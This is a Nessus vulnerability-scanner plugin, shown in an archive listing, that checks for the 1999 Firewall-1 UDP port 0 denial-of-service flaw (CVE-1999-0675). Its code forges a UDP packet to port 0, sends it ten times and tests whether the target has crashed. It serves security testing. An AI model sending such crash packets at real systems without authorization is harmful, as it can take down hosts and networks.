home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / firewall1_dos.nasl

< prev

next >

Wrap

Text File  |  2005-01-14  |  3KB  |  110 lines

---

1. #
2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
3. #
4. # See the Nessus Scripts License for details
5. #
6.  
7. if(description)
8. {
9.  script_id(10074);
10.  script_bugtraq_id(576);
11.  script_version ("$Revision: 1.12 $");
12.  script_cve_id("CVE-1999-0675");
13.  name["english"] = "Firewall/1 UDP port 0 DoS";
14.  name["francais"] = "DΘni de service Firewall/1 port 0 udp";
15.  script_name(english:name["english"], francais:name["francais"]);
16.  
17.  desc["english"] = "It was possible to
18. crash either the remote host or the firewall
19. in between us and the remote host by sending
20. an UDP packet going to port 0.
21.  
22. This flaw may allow an attacker to shut down
23. your network.
24.  
25. Solution : contact your firewall vendor if
26. it was the firewall which crashed, or filter
27. incoming UDP traffic if the remote host crashed.
28.  
29. Risk factor : High";
30.  
31.  
32.  desc["francais"] = "Il s'est avΘrΘ possible
33. de faire planter le systΦme distant ou le firewall
34. situΘ entre nous et le systΦme distant en envoyant
35. un paquet UDP allant vers le port 0.
36.  
37. Ce problΦme peut permettre α un pirate de mettre
38. hors d'Θtat de marche tout votre rΘseau. 
39.  
40.  
41. Solution : contactez l'Θditeur du firewall pour
42. un patch si c'est celui-ci qui a plantΘ, ou alors
43. filtrez le traffic UDP si c'est la machine distante
44. qui a plantΘ.
45.  
46. Facteur de risque : ElevΘ";
47.  
48.  script_description(english:desc["english"], francais:desc["francais"]);
49.  
50.  summary["english"] = "Crashes the remote host by sending a UDP packet going to port 0";
51.  summary["francais"] = "Tue le serveur distant en envoyant un packet UDP sur le port 0";
52.  script_summary(english:summary["english"], francais:summary["francais"]);
53.  
54.  script_category(ACT_KILL_HOST);
55.  
56.  
57.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
58.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
59.  family["english"] = "Denial of Service";
60.  family["francais"] = "DΘni de service";
61.  script_family(english:family["english"], francais:family["francais"]);
62.  
63.  
64.  exit(0);
65. }
66.  
67. #
68. # The script code starts here
69. #
70.  
71. start_denial();
72.  
73.  
74. ip = forge_ip_packet(ip_v   : 4,
75.              ip_hl  : 5,
76.              ip_tos : 0,
77.              ip_id  : 0x4321,
78.              ip_len : 28,
79.              ip_off : 0,
80.              ip_p   : IPPROTO_UDP,
81.              ip_src : this_host(),
82.              ip_ttl : 0x40);
83.  
84. # Forge the UDP packet
85.         
86. udp = forge_udp_packet( ip : ip,
87.             uh_sport : 1234, uh_dport : 0,
88.             uh_ulen : 8);             
89.  
90.  
91. #
92. # Send this packet 10 times
93. #
94.  
95. send_packet(udp, pcap_active:FALSE) x 10;    
96.  
97. #
98. # wait
99. #
100. sleep(5);
101.  
102. #
103. # And check...
104. #
105. alive = end_denial();
106. if(!alive){
107.                 set_kb_item(name:"Host/dead", value:TRUE);
108.                 security_hole(0);
109.                 }
110.